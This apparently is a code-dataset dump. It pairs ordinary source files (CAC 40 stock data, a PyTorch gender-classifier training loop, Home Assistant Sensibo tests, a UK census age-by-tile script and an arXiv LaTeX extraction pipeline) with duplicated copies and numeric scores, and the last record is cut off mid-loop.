'DANONE' : [54.0, 37.0e9, 'Consumer goods'],
'<NAME>' : [122, 32.4e9, 'Consumer goods'],
'ENGIE' : [10.0, 24.3e9, 'Utilities'],
'DASSAULT SYSTEMES' : [108, 28.5e9, 'Technology'],
'ORANGE' : [9.40, 25.0e9, 'Telecommunications'],
'CREDIT AGRICOLE' : [6.08, 17.5e9, 'Financials'],
'VIVENDI' : [17.6, 20.8e9, 'Consumer services'],
'SOCIETE GENERALE' : [14.5, 12.4e9,'Financials'],
'STMICROELECTRONICS' : [16.4, 15.0e9, 'Technology'],
'THALES' : [65.8, 14.0e9, 'Industrials'],
'LEGRAND' : [50.8, 13.6e9, 'Industrials'],
'SAINT-GOBAIN' : [19.4, 10.5e9, 'Industrials'],
'MICHELIN' : [71.0, 12.7e9, 'Consumer goods'],
'CAPGEMINI' : [62.7, 10.6e9, 'Technology'],
'PSA' : [11.0, 9.98e9, 'Consumer goods'],
'UNIBAIL-RODAMCO-WESTFIELD' : [58.1, 8.04e9, 'Financials'],
'VEOLIA' : [17.5, 9.95e9, 'Utilities'],
'BOUYGUES' : [24.2, 9.20e9, 'Industrials'],
'ARCELORMITTAL' : [7.19, 7.34e9, 'Basic materials'],
'SODEXO' : [56.5, 8.33e9, 'Consumer services'],
'CARREFOUR' : [12.9, 10.4e9, 'Consumer services'],
'ACCOR' : [24.2, 6.54e9, 'Consumer services'],
'PUBLICIS' : [22.9, 5.51e9, 'Consumer services'],
'RENAULT' : [14.6, 4.30e9, 'Consumer goods'],
'ATOS' : [47.6, 5.20e9, 'Technology'],
'TECHNIPFMC' : [5.92, 2.65e9, 'Oil and gas']
} | catbars/cac40.py | date = '16/03/2020'
data = {
'LVMH': [298, 150e9, 'Consumer goods'] ,
'L\'OREAL': [208, 116e9, 'Consumer goods'],
'SANOFI' : [77.0, 96.0e9, 'Health care'],
'AIRBUS' : [69, 54.0e9, 'Industrials'],
'TOTAL' : [24.3, 63.3e9, 'Oil and gas'],
'HERMES' : [548, 57.9e9, 'Consumer goods'],
'KERING' : [378, 47.7e9, 'Consumer services'],
'AIR LIQUIDE' : [99.2, 47.0e9, 'Basic materials'],
'BNP PARIBAS' : [27.4, 34.3e9, 'Financials'],
'VINCI' : [59.0, 35.8e9, 'Industrials'],
'ESSILORLUXOTTICA' : [96.0, 41.9e9, 'Health care'],
'SCHNEIDER ELECTRIC' : [70.4, 41.0e9, 'Industrials'],
'AXA' : [13.4, 32.5e9, 'Financials'],
'SAFRAN' : [74.5, 29.9e9, 'Industrials'],
'DANONE' : [54.0, 37.0e9, 'Consumer goods'],
'<NAME>' : [122, 32.4e9, 'Consumer goods'],
'ENGIE' : [10.0, 24.3e9, 'Utilities'],
'DASSAULT SYSTEMES' : [108, 28.5e9, 'Technology'],
'ORANGE' : [9.40, 25.0e9, 'Telecommunications'],
'CREDIT AGRICOLE' : [6.08, 17.5e9, 'Financials'],
'VIVENDI' : [17.6, 20.8e9, 'Consumer services'],
'SOCIETE GENERALE' : [14.5, 12.4e9,'Financials'],
'STMICROELECTRONICS' : [16.4, 15.0e9, 'Technology'],
'THALES' : [65.8, 14.0e9, 'Industrials'],
'LEGRAND' : [50.8, 13.6e9, 'Industrials'],
'SAINT-GOBAIN' : [19.4, 10.5e9, 'Industrials'],
'MICHELIN' : [71.0, 12.7e9, 'Consumer goods'],
'CAPGEMINI' : [62.7, 10.6e9, 'Technology'],
'PSA' : [11.0, 9.98e9, 'Consumer goods'],
'UNIBAIL-RODAMCO-WESTFIELD' : [58.1, 8.04e9, 'Financials'],
'VEOLIA' : [17.5, 9.95e9, 'Utilities'],
'BOUYGUES' : [24.2, 9.20e9, 'Industrials'],
'ARCELORMITTAL' : [7.19, 7.34e9, 'Basic materials'],
'SODEXO' : [56.5, 8.33e9, 'Consumer services'],
'CARREFOUR' : [12.9, 10.4e9, 'Consumer services'],
'ACCOR' : [24.2, 6.54e9, 'Consumer services'],
'PUBLICIS' : [22.9, 5.51e9, 'Consumer services'],
'RENAULT' : [14.6, 4.30e9, 'Consumer goods'],
'ATOS' : [47.6, 5.20e9, 'Technology'],
'TECHNIPFMC' : [5.92, 2.65e9, 'Oil and gas']
} | 0.331661 | 0.338282 |
import torch
from torch.optim import Adam
import torch.nn as nn
import torch.nn.functional as F
from tqdm import tqdm
import os
from utils.preprocess import timit_dataloader, dataloader
from sklearn.metrics import accuracy_score
from gender_detector.model import Model
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print(f'using {device} mode')
patience = 500
best_loss = 1000
cnt = 0
if __name__ == '__main__':
# os.mkdir('gender_detector/checkpoint')
model = Model()
if device == torch.device('cuda'):
model.cuda()
else:
model.cpu()
model.train()
_timit_dataloader = timit_dataloader()
train, valid, test = _timit_dataloader.return_data()
trainset = dataloader(*train)
validset = dataloader(*valid)
testset = dataloader(*test)
BATCH_SIZE = 64
optimizer = Adam(
[p for p in model.parameters() if p.requires_grad], betas=(0.9, 0.999), eps=1e-5
)
for i in tqdm(range(1000)):
optimizer.zero_grad()
input, target = trainset.next_batch(BATCH_SIZE, device=device)
out = model(input)
loss = model.loss(out, target)
loss.backward()
optimizer.step()
if i % 50 == 0:
model.eval()
with torch.no_grad():
optimizer.zero_grad()
input, target = validset.next_batch(BATCH_SIZE, device=device)
out = model(input)
valid_loss = model.loss(out, target)
out, target = out.cpu().detach().numpy(), target.cpu().detach().numpy()
# print(out, target)
out = [1. if tmp > 0.5 else 0 for tmp in out]
print(f'accuracy_score:{accuracy_score(out, target)}')
print("i {}, valid {}".format(i, valid_loss.item()))
print("_________")
model.train()
if i % 50 == 0 and best_loss > valid_loss.item():
print('new best')
best_loss = valid_loss.item()
torch.save(model.state_dict(), "gender_detector/checkpoint/best.pt".format(i))
cnt = 0
else:
cnt += 1
if cnt > patience:
break
print('training finished') | gender_detector/train.py | import torch
from torch.optim import Adam
import torch.nn as nn
import torch.nn.functional as F
from tqdm import tqdm
import os
from utils.preprocess import timit_dataloader, dataloader
from sklearn.metrics import accuracy_score
from gender_detector.model import Model
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print(f'using {device} mode')
patience = 500
best_loss = 1000
cnt = 0
if __name__ == '__main__':
# os.mkdir('gender_detector/checkpoint')
model = Model()
if device == torch.device('cuda'):
model.cuda()
else:
model.cpu()
model.train()
_timit_dataloader = timit_dataloader()
train, valid, test = _timit_dataloader.return_data()
trainset = dataloader(*train)
validset = dataloader(*valid)
testset = dataloader(*test)
BATCH_SIZE = 64
optimizer = Adam(
[p for p in model.parameters() if p.requires_grad], betas=(0.9, 0.999), eps=1e-5
)
for i in tqdm(range(1000)):
optimizer.zero_grad()
input, target = trainset.next_batch(BATCH_SIZE, device=device)
out = model(input)
loss = model.loss(out, target)
loss.backward()
optimizer.step()
if i % 50 == 0:
model.eval()
with torch.no_grad():
optimizer.zero_grad()
input, target = validset.next_batch(BATCH_SIZE, device=device)
out = model(input)
valid_loss = model.loss(out, target)
out, target = out.cpu().detach().numpy(), target.cpu().detach().numpy()
# print(out, target)
out = [1. if tmp > 0.5 else 0 for tmp in out]
print(f'accuracy_score:{accuracy_score(out, target)}')
print("i {}, valid {}".format(i, valid_loss.item()))
print("_________")
model.train()
if i % 50 == 0 and best_loss > valid_loss.item():
print('new best')
best_loss = valid_loss.item()
torch.save(model.state_dict(), "gender_detector/checkpoint/best.pt".format(i))
cnt = 0
else:
cnt += 1
if cnt > patience:
break
print('training finished') | 0.540439 | 0.303113 |
from __future__ import annotations
from unittest.mock import patch
from homeassistant import config_entries
from homeassistant.components.sensibo.const import DOMAIN
from homeassistant.components.sensibo.util import NoUsernameError
from homeassistant.config_entries import SOURCE_USER
from homeassistant.core import HomeAssistant
from . import ENTRY_CONFIG
from .response import DATA_FROM_API
from tests.common import MockConfigEntry
async def test_setup_entry(hass: HomeAssistant) -> None:
"""Test setup entry."""
entry = MockConfigEntry(
domain=DOMAIN,
source=SOURCE_USER,
data=ENTRY_CONFIG,
entry_id="1",
unique_id="12",
version=2,
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=DATA_FROM_API,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices",
return_value={"result": [{"id": "xyzxyz"}, {"id": "abcabc"}]},
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_me",
return_value={"result": {"username": "username"}},
):
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
assert entry.state == config_entries.ConfigEntryState.LOADED
async def test_migrate_entry(hass: HomeAssistant) -> None:
"""Test migrate entry unique id."""
entry = MockConfigEntry(
domain=DOMAIN,
source=SOURCE_USER,
data=ENTRY_CONFIG,
entry_id="1",
unique_id="12",
version=1,
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=DATA_FROM_API,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices",
return_value={"result": [{"id": "xyzxyz"}, {"id": "abcabc"}]},
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_me",
return_value={"result": {"username": "username"}},
):
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
assert entry.state == config_entries.ConfigEntryState.LOADED
assert entry.version == 2
assert entry.unique_id == "username"
async def test_migrate_entry_fails(hass: HomeAssistant) -> None:
"""Test migrate entry unique id."""
entry = MockConfigEntry(
domain=DOMAIN,
source=SOURCE_USER,
data=ENTRY_CONFIG,
entry_id="1",
unique_id="12",
version=1,
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices",
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_me",
side_effect=NoUsernameError("No username returned"),
):
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
assert entry.state == config_entries.ConfigEntryState.MIGRATION_ERROR
assert entry.version == 1
assert entry.unique_id == "12"
async def test_unload_entry(hass: HomeAssistant) -> None:
"""Test unload an entry."""
entry = MockConfigEntry(
domain=DOMAIN,
source=SOURCE_USER,
data=ENTRY_CONFIG,
entry_id="1",
unique_id="12",
version="2",
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=DATA_FROM_API,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices",
return_value={"result": [{"id": "xyzxyz"}, {"id": "abcabc"}]},
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_me",
return_value={"result": {"username": "username"}},
):
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
assert entry.state == config_entries.ConfigEntryState.LOADED
assert await hass.config_entries.async_unload(entry.entry_id)
await hass.async_block_till_done()
assert entry.state is config_entries.ConfigEntryState.NOT_LOADED | tests/components/sensibo/test_init.py | from __future__ import annotations
from unittest.mock import patch
from homeassistant import config_entries
from homeassistant.components.sensibo.const import DOMAIN
from homeassistant.components.sensibo.util import NoUsernameError
from homeassistant.config_entries import SOURCE_USER
from homeassistant.core import HomeAssistant
from . import ENTRY_CONFIG
from .response import DATA_FROM_API
from tests.common import MockConfigEntry
async def test_setup_entry(hass: HomeAssistant) -> None:
"""Test setup entry."""
entry = MockConfigEntry(
domain=DOMAIN,
source=SOURCE_USER,
data=ENTRY_CONFIG,
entry_id="1",
unique_id="12",
version=2,
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=DATA_FROM_API,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices",
return_value={"result": [{"id": "xyzxyz"}, {"id": "abcabc"}]},
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_me",
return_value={"result": {"username": "username"}},
):
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
assert entry.state == config_entries.ConfigEntryState.LOADED
async def test_migrate_entry(hass: HomeAssistant) -> None:
"""Test migrate entry unique id."""
entry = MockConfigEntry(
domain=DOMAIN,
source=SOURCE_USER,
data=ENTRY_CONFIG,
entry_id="1",
unique_id="12",
version=1,
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=DATA_FROM_API,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices",
return_value={"result": [{"id": "xyzxyz"}, {"id": "abcabc"}]},
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_me",
return_value={"result": {"username": "username"}},
):
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
assert entry.state == config_entries.ConfigEntryState.LOADED
assert entry.version == 2
assert entry.unique_id == "username"
async def test_migrate_entry_fails(hass: HomeAssistant) -> None:
"""Test migrate entry unique id."""
entry = MockConfigEntry(
domain=DOMAIN,
source=SOURCE_USER,
data=ENTRY_CONFIG,
entry_id="1",
unique_id="12",
version=1,
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices",
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_me",
side_effect=NoUsernameError("No username returned"),
):
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
assert entry.state == config_entries.ConfigEntryState.MIGRATION_ERROR
assert entry.version == 1
assert entry.unique_id == "12"
async def test_unload_entry(hass: HomeAssistant) -> None:
"""Test unload an entry."""
entry = MockConfigEntry(
domain=DOMAIN,
source=SOURCE_USER,
data=ENTRY_CONFIG,
entry_id="1",
unique_id="12",
version="2",
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=DATA_FROM_API,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices",
return_value={"result": [{"id": "xyzxyz"}, {"id": "abcabc"}]},
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_me",
return_value={"result": {"username": "username"}},
):
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
assert entry.state == config_entries.ConfigEntryState.LOADED
assert await hass.config_entries.async_unload(entry.entry_id)
await hass.async_block_till_done()
assert entry.state is config_entries.ConfigEntryState.NOT_LOADED | 0.724968 | 0.227523 |
import __main__ as main
import sys
import geopandas as gpd
import pandas as pd
import numpy as np
if not hasattr(main, '__file__'):
argv = ['code', 'data/processed/geo/tiles.shp',
'data/processed/census/oa_tile_reference.csv',
'data/raw/census/engwal_OA_lsoa.csv',
'data/raw/census/OA_to_DZ.csv',
'data/raw/census/NI_SA_Centroids.shp',
'data/raw/age_data/ew_age.csv',
'data/raw/age_data/QS103SC.csv',
'data/raw/age_data/KS102NI (s).csv',
'data/raw/census/Eng_Wal_OA_Mid_Pop.csv',
'data/raw/census/simd2020_withinds.csv',
'data/raw/census/NI_Mid_Pop.csv',
'data/processed/census/quadkey_mean_age.csv']
else:
argv = sys.argv
tiles = gpd.read_file(argv[1])
tiles.crs = 4326
oa_tile_lookup = pd.read_csv(argv[2])
oa_lus = {'england': pd.read_csv(argv[3]),
'scotland': pd.read_csv(argv[4]),
'ni': gpd.read_file(argv[5])}
oa_lus['ni'] = oa_lus['ni'].loc[:, ['SA2011', 'SOA2011']]
age_data = {'england': pd.read_csv(argv[6]),
'scotland': pd.read_csv(argv[7]),
'ni': pd.read_csv(argv[8])}
scotland_imd = pd.read_csv(argv[10])
pop_data = {'england': pd.read_csv(argv[9]),
'scotland': pd.read_csv(argv[10]),
'ni': pd.read_csv(argv[11])}
scotland_n_oas = oa_lus['scotland'].groupby('DataZone2011Code').count().reset_index()[['DataZone2011Code', 'OutputArea2011Code']].rename(columns = {'DataZone2011Code':'DZ', 'OutputArea2011Code':'n_oas'})
scotland_pop = pd.merge(scotland_imd, scotland_n_oas)[['DZ', 'Total_population', 'n_oas']]
scotland_pop = pd.merge(oa_lus['scotland'][['OutputArea2011Code', 'DataZone2011Code']].rename(columns={'OutputArea2011Code':'OA', 'DataZone2011Code':'DZ'}), scotland_pop)
scotland_pop['Total_population'] = scotland_pop['Total_population'] / scotland_pop['n_oas']
scotland_pop = scotland_pop.drop(columns = ['n_oas', 'DZ']).rename(columns = {'Total_population':'pop'})
wm_e = lambda x: np.average(x, weights=age_data['england'].loc[x.index, "value"])
age_data['england'] = pd.melt(age_data['england'], id_vars = ['Area Codes'], value_vars = age_data['england'].columns[4:])
age_data['england']['variable'] = [str(x).replace('+', '') for x in age_data['england']['variable']]
age_data['england']['variable'] = pd.to_numeric(age_data['england']['variable'], errors = 'coerce')
age_data['england'] = age_data['england'].groupby(['Area Codes']).agg(mean_age = ('variable', wm_e)).reset_index()
# Scotland
wm_s = lambda x: np.average(x, weights=age_data['scotland'].loc[x.index, "value"])
age_data['scotland'] = pd.melt(age_data['scotland'], id_vars = ['Area'], value_vars = age_data['scotland'].columns[2:])
age_data['scotland']['variable'] = [str(x).replace('Under ', '') for x in age_data['scotland']['variable']]
age_data['scotland']['variable'] = [str(x).replace(' and over', '') for x in age_data['scotland']['variable']]
age_data['scotland']['variable'] = pd.to_numeric(age_data['scotland']['variable'], errors = 'coerce')
age_data['scotland']['value'] = pd.to_numeric(age_data['scotland']['value'], errors = 'coerce')
age_data['scotland'].dropna(subset = ['value'], inplace = True)
age_data['scotland'] = age_data['scotland'].groupby(['Area']).agg(mean_age = ('variable', wm_s)).reset_index()
# This is done for ireland
age_data['ni']['Mean age of population']
'''
Merge mean ages with look up tables
'''
ew_age = pd.merge(oa_lus['england'], age_data['england'], left_on='LSOA11CD', right_on='Area Codes', how = 'left')
scotand_age = pd.merge(oa_lus['scotland'], age_data['scotland'], left_on='DataZone2011Code', right_on='Area', how = 'left')
ni_age = pd.merge(oa_lus['ni'], age_data['ni'], left_on='SOA2011', right_on='SOA Code', how = 'left')[['SA2011', 'SOA2011', 'Mean age of population']]
'''
Merge this with OA population estimates
'''
ew_age = pd.merge(ew_age, pop_data['england'], left_on='OA11CD', right_on='OA')
scotand_age = pd.merge(scotand_age, scotland_pop, left_on='OutputArea2011Code', right_on='OA')
ni_age = pd.merge(ni_age, pop_data['ni'], left_on='SA2011', right_on='Area_Code')
ew_age['country'] = ew_age['OA11CD'].astype(str).str[0]
ew_age['country'] = [str(x).replace('E', 'England') for x in ew_age['country']]
ew_age['country'] = [str(x).replace('W', 'Wales') for x in ew_age['country']]
scotand_age['country'] = 'Scotland'
ni_age['country'] = 'Northern Ireland'
ew_age = ew_age.rename(columns = {'Pop':'pop'})[['OA', 'pop', 'mean_age', 'country']]
scotand_age = scotand_age[['OA', 'pop', 'mean_age', 'country']]
ni_age = ni_age.rename(columns = {'SA2011':'OA', 'MYE':'pop', 'Mean age of population':'mean_age'})[['OA', 'pop', 'mean_age', 'country']]
age = pd.concat([ew_age, scotand_age, ni_age])
age = pd.merge(oa_tile_lookup, age, left_on = 'OA', right_on = 'OA', how = 'left')
wm = lambda x: np.average(x, weights=age.loc[x.index, "pop"])
age = age.groupby(['country', 'quadkey_12']).agg(wm_age=("mean_age", wm)).reset_index()
age.to_csv(argv[-1]) | src/data/census/tile_age.py | import __main__ as main
import sys
import geopandas as gpd
import pandas as pd
import numpy as np
if not hasattr(main, '__file__'):
argv = ['code', 'data/processed/geo/tiles.shp',
'data/processed/census/oa_tile_reference.csv',
'data/raw/census/engwal_OA_lsoa.csv',
'data/raw/census/OA_to_DZ.csv',
'data/raw/census/NI_SA_Centroids.shp',
'data/raw/age_data/ew_age.csv',
'data/raw/age_data/QS103SC.csv',
'data/raw/age_data/KS102NI (s).csv',
'data/raw/census/Eng_Wal_OA_Mid_Pop.csv',
'data/raw/census/simd2020_withinds.csv',
'data/raw/census/NI_Mid_Pop.csv',
'data/processed/census/quadkey_mean_age.csv']
else:
argv = sys.argv
tiles = gpd.read_file(argv[1])
tiles.crs = 4326
oa_tile_lookup = pd.read_csv(argv[2])
oa_lus = {'england': pd.read_csv(argv[3]),
'scotland': pd.read_csv(argv[4]),
'ni': gpd.read_file(argv[5])}
oa_lus['ni'] = oa_lus['ni'].loc[:, ['SA2011', 'SOA2011']]
age_data = {'england': pd.read_csv(argv[6]),
'scotland': pd.read_csv(argv[7]),
'ni': pd.read_csv(argv[8])}
scotland_imd = pd.read_csv(argv[10])
pop_data = {'england': pd.read_csv(argv[9]),
'scotland': pd.read_csv(argv[10]),
'ni': pd.read_csv(argv[11])}
scotland_n_oas = oa_lus['scotland'].groupby('DataZone2011Code').count().reset_index()[['DataZone2011Code', 'OutputArea2011Code']].rename(columns = {'DataZone2011Code':'DZ', 'OutputArea2011Code':'n_oas'})
scotland_pop = pd.merge(scotland_imd, scotland_n_oas)[['DZ', 'Total_population', 'n_oas']]
scotland_pop = pd.merge(oa_lus['scotland'][['OutputArea2011Code', 'DataZone2011Code']].rename(columns={'OutputArea2011Code':'OA', 'DataZone2011Code':'DZ'}), scotland_pop)
scotland_pop['Total_population'] = scotland_pop['Total_population'] / scotland_pop['n_oas']
scotland_pop = scotland_pop.drop(columns = ['n_oas', 'DZ']).rename(columns = {'Total_population':'pop'})
wm_e = lambda x: np.average(x, weights=age_data['england'].loc[x.index, "value"])
age_data['england'] = pd.melt(age_data['england'], id_vars = ['Area Codes'], value_vars = age_data['england'].columns[4:])
age_data['england']['variable'] = [str(x).replace('+', '') for x in age_data['england']['variable']]
age_data['england']['variable'] = pd.to_numeric(age_data['england']['variable'], errors = 'coerce')
age_data['england'] = age_data['england'].groupby(['Area Codes']).agg(mean_age = ('variable', wm_e)).reset_index()
# Scotland
wm_s = lambda x: np.average(x, weights=age_data['scotland'].loc[x.index, "value"])
age_data['scotland'] = pd.melt(age_data['scotland'], id_vars = ['Area'], value_vars = age_data['scotland'].columns[2:])
age_data['scotland']['variable'] = [str(x).replace('Under ', '') for x in age_data['scotland']['variable']]
age_data['scotland']['variable'] = [str(x).replace(' and over', '') for x in age_data['scotland']['variable']]
age_data['scotland']['variable'] = pd.to_numeric(age_data['scotland']['variable'], errors = 'coerce')
age_data['scotland']['value'] = pd.to_numeric(age_data['scotland']['value'], errors = 'coerce')
age_data['scotland'].dropna(subset = ['value'], inplace = True)
age_data['scotland'] = age_data['scotland'].groupby(['Area']).agg(mean_age = ('variable', wm_s)).reset_index()
# This is done for ireland
age_data['ni']['Mean age of population']
'''
Merge mean ages with look up tables
'''
ew_age = pd.merge(oa_lus['england'], age_data['england'], left_on='LSOA11CD', right_on='Area Codes', how = 'left')
scotand_age = pd.merge(oa_lus['scotland'], age_data['scotland'], left_on='DataZone2011Code', right_on='Area', how = 'left')
ni_age = pd.merge(oa_lus['ni'], age_data['ni'], left_on='SOA2011', right_on='SOA Code', how = 'left')[['SA2011', 'SOA2011', 'Mean age of population']]
'''
Merge this with OA population estimates
'''
ew_age = pd.merge(ew_age, pop_data['england'], left_on='OA11CD', right_on='OA')
scotand_age = pd.merge(scotand_age, scotland_pop, left_on='OutputArea2011Code', right_on='OA')
ni_age = pd.merge(ni_age, pop_data['ni'], left_on='SA2011', right_on='Area_Code')
ew_age['country'] = ew_age['OA11CD'].astype(str).str[0]
ew_age['country'] = [str(x).replace('E', 'England') for x in ew_age['country']]
ew_age['country'] = [str(x).replace('W', 'Wales') for x in ew_age['country']]
scotand_age['country'] = 'Scotland'
ni_age['country'] = 'Northern Ireland'
ew_age = ew_age.rename(columns = {'Pop':'pop'})[['OA', 'pop', 'mean_age', 'country']]
scotand_age = scotand_age[['OA', 'pop', 'mean_age', 'country']]
ni_age = ni_age.rename(columns = {'SA2011':'OA', 'MYE':'pop', 'Mean age of population':'mean_age'})[['OA', 'pop', 'mean_age', 'country']]
age = pd.concat([ew_age, scotand_age, ni_age])
age = pd.merge(oa_tile_lookup, age, left_on = 'OA', right_on = 'OA', how = 'left')
wm = lambda x: np.average(x, weights=age.loc[x.index, "pop"])
age = age.groupby(['country', 'quadkey_12']).agg(wm_age=("mean_age", wm)).reset_index()
age.to_csv(argv[-1]) | 0.260484 | 0.245051 |
import ray
import json
import os
import logging
import argparse
import psutil
import tqdm
import arxiv_library.io_pkg.targz as io_targz
import arxiv_library.io_pkg.metadata as io_metadata
import arxiv_library.extraction.comments as comments
import arxiv_library.extraction.imports as imports
import arxiv_library.extraction.preamble as preamble
import arxiv_library.extraction.sections as sections
import arxiv_library.extraction.equations as equations
import arxiv_library.extraction.citations as citations
import arxiv_library.compilation.mathml as mathml
@ray.remote(num_cpus=1)
def _extract(targzs):
processed = []
for gz in targzs:
try:
processed.append(io_targz.process_gz(gz))
except io_targz.EmptyFileDictException as exception:
logging.debug(exception)
except Exception as exception:
logging.warning(exception)
return processed
@ray.remote(num_cpus=1)
def _pipeline(file_dicts, json_dir, fulltext):
paper_dicts = []
for file_dict in file_dicts:
try:
file_dict = comments.remove_comments(file_dict)
paper_dict = imports.resolve_imports(file_dict)
paper_dict = preamble.extract_preamble(paper_dict)
paper_dict = sections.extract_sections(paper_dict)
paper_dict = equations.extract_equations(paper_dict)
paper_dict = citations.extract_citations(paper_dict)
if not fulltext:
del paper_dict['paper']
for section in paper_dict['sections']:
del section['latex']
paper_dict = mathml.compile_paper(paper_dict, paper_dict['arxiv_id'])
paper_dicts.append(paper_dict)
except imports.NoMainFileException as exception:
logging.debug(exception)
except Exception as exception:
logging.warning(exception)
try:
paper_dicts = io_metadata.receive_meta_data(paper_dicts)
for paper_dict in paper_dicts:
with open(os.path.join(json_dir, '{}.json'.format(paper_dict['arxiv_id'])), 'w') as file:
json.dump(paper_dict, file, indent=4)
except Exception as exception:
logging.warning(exception)
def pipeline(tar_dir, json_dir, fulltext=False):
"""
Extracts all tar files in a folder and generates corresponding paper dictionaries with keys sections, metadata,
arxiv_id, citations and preamble. For information on the dictionary structure please read the README file. These
files will be stored as json at the target directory. If fulltext is set to True, sections have another key latex,
where the fulltext for each section is stored, and the paper dictionary has an additional key paper where the full
paper is stored.
:param tar_dir: The directory where the tar files are located
:param json_dir: The directory where the json files should be saved
:param fulltext: Iff true, the paper will be stored in the paper dict with key 'paper'; default=False
"""
ray.init(log_to_driver=True)
tar_paths = os.listdir(tar_dir)
total_papers = 0
with tqdm.tqdm(total=len(tar_paths), desc='0 papers in total | tar progress') as progress:
for tar_path in (os.path.join(tar_dir, p) for p in tar_paths):
targzs = io_targz.process_tar(tar_path)
chunk_size = max(len(targzs) // (psutil.cpu_count()), 1)
remaining_chunk_ids = []
for chunk in (targzs[i:i + chunk_size] for i in range(0, len(targzs), chunk_size)):
remaining_chunk_ids.append(_extract.remote(chunk))
pipeline_ids = []
while remaining_chunk_ids:
ready_chunk_ids, remaining_chunk_ids = ray.wait(remaining_chunk_ids, num_returns=1)
for chunk_id in ready_chunk_ids:
pipeline_ids.append(_pipeline.remote(chunk_id, json_dir, fulltext))
total_papers += chunk_size
progress.set_description_str('{} papers in total | tar progress'.format(total_papers))
ray.wait(pipeline_ids, num_returns=len(pipeline_ids))
progress.update(1)
ray.shutdown() | arxiv_library/pipeline.py | import ray
import json
import os
import logging
import argparse
import psutil
import tqdm
import arxiv_library.io_pkg.targz as io_targz
import arxiv_library.io_pkg.metadata as io_metadata
import arxiv_library.extraction.comments as comments
import arxiv_library.extraction.imports as imports
import arxiv_library.extraction.preamble as preamble
import arxiv_library.extraction.sections as sections
import arxiv_library.extraction.equations as equations
import arxiv_library.extraction.citations as citations
import arxiv_library.compilation.mathml as mathml
@ray.remote(num_cpus=1)
def _extract(targzs):
processed = []
for gz in targzs:
try:
processed.append(io_targz.process_gz(gz))
except io_targz.EmptyFileDictException as exception:
logging.debug(exception)
except Exception as exception:
logging.warning(exception)
return processed
@ray.remote(num_cpus=1)
def _pipeline(file_dicts, json_dir, fulltext):
paper_dicts = []
for file_dict in file_dicts:
try:
file_dict = comments.remove_comments(file_dict)
paper_dict = imports.resolve_imports(file_dict)
paper_dict = preamble.extract_preamble(paper_dict)
paper_dict = sections.extract_sections(paper_dict)
paper_dict = equations.extract_equations(paper_dict)
paper_dict = citations.extract_citations(paper_dict)
if not fulltext:
del paper_dict['paper']
for section in paper_dict['sections']:
del section['latex']
paper_dict = mathml.compile_paper(paper_dict, paper_dict['arxiv_id'])
paper_dicts.append(paper_dict)
except imports.NoMainFileException as exception:
logging.debug(exception)
except Exception as exception:
logging.warning(exception)
try:
paper_dicts = io_metadata.receive_meta_data(paper_dicts)
for paper_dict in paper_dicts:
with open(os.path.join(json_dir, '{}.json'.format(paper_dict['arxiv_id'])), 'w') as file:
json.dump(paper_dict, file, indent=4)
except Exception as exception:
logging.warning(exception)
def pipeline(tar_dir, json_dir, fulltext=False):
"""
Extracts all tar files in a folder and generates corresponding paper dictionaries with keys sections, metadata,
arxiv_id, citations and preamble. For information on the dictionary structure please read the README file. These
files will be stored as json at the target directory. If fulltext is set to True, sections have another key latex,
where the fulltext for each section is stored, and the paper dictionary has an additional key paper where the full
paper is stored.
:param tar_dir: The directory where the tar files are located
:param json_dir: The directory where the json files should be saved
:param fulltext: Iff true, the paper will be stored in the paper dict with key 'paper'; default=False
"""
ray.init(log_to_driver=True)
tar_paths = os.listdir(tar_dir)
total_papers = 0
with tqdm.tqdm(total=len(tar_paths), desc='0 papers in total | tar progress') as progress:
for tar_path in (os.path.join(tar_dir, p) for p in tar_paths):
targzs = io_targz.process_tar(tar_path)
chunk_size = max(len(targzs) // (psutil.cpu_count()), 1)
remaining_chunk_ids = []
for chunk in (targzs[i:i + chunk_size] for i in range(0, len(targzs), chunk_size)):
remaining_chunk_ids.append(_extract.remote(chunk))
pipeline_ids = []
while remaining_chunk_ids:
ready_chunk_ids, remaining_chunk_ids = ray.wait(remaining_chunk_ids, num_returns=1)
